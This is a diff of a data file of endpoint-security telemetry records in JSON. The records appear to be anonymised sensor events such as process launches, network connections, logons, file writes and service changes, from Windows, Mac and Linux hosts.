-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"208.62.90.250","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"} -{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"} -{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"208.65.31.23","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"208.226.182.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"} -{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"208.216.134.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} -{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"208.216.134.214","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"a93:432:ffff:0:c830:b4bf:1e0:ffff","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"208.222.208.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:ffff:11:8000:d140:da90:aa7a:62a5","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a00:ffff:11:809:0:0:0:200e","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"208.68.193.187","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"208.213.180.70","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"208.131.50.212","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} -{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"208.216.134.193","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"208.71.20.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} -{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} -{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"208.30.227.225","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} -{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"208.239.110.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} -{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} -{"BootArgs":" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"208.6.139.160","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} -{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"208.216.134.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"208.216.150.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} -{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"208.193.200.164","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"} -{"AgentLoadFlags":"0","AgentLocalTime":"1636436839.9529998","AgentTimeOffset":"125.319","AgentVersion":"6.31.14404.0","BiosManufacturer":"Apple Inc.","BiosVersion":"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)","ChassisType":"Laptop","City":"San Francisco","ComputerName":"mac1","ConfigBuild":"1007.4.0014404.1","ConfigIDBuild":"14404","Continent":"North America","Country":"United States","FalconGroupingTags":"-","FirstSeen":"1625682391.0","HostHiddenStatus":"Visible","MachineDomain":"none","OU":"none","PointerSize":"none","ProductType":"1","SensorGroupingTags":"-","ServicePackMajor":"none","SiteName":"none","SystemManufacturer":"Apple Inc.","SystemProductName":"MacBookPro16,2","Time":"1636448427.3539999","Timezone":"America/Los_Angeles","Version":"Big Sur (11.0)","aid":"fffffffffffaaaaaaaaabbbbbbbb","aip":"208.30.227.225","cid":"ffffffff30a3407dae27d0503611022ff","event_platform":"Mac"} \ No newline at end of file +{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"67.43.156.14","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"67.43.156.14","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"67.43.156.14","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"67.43.156.14","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 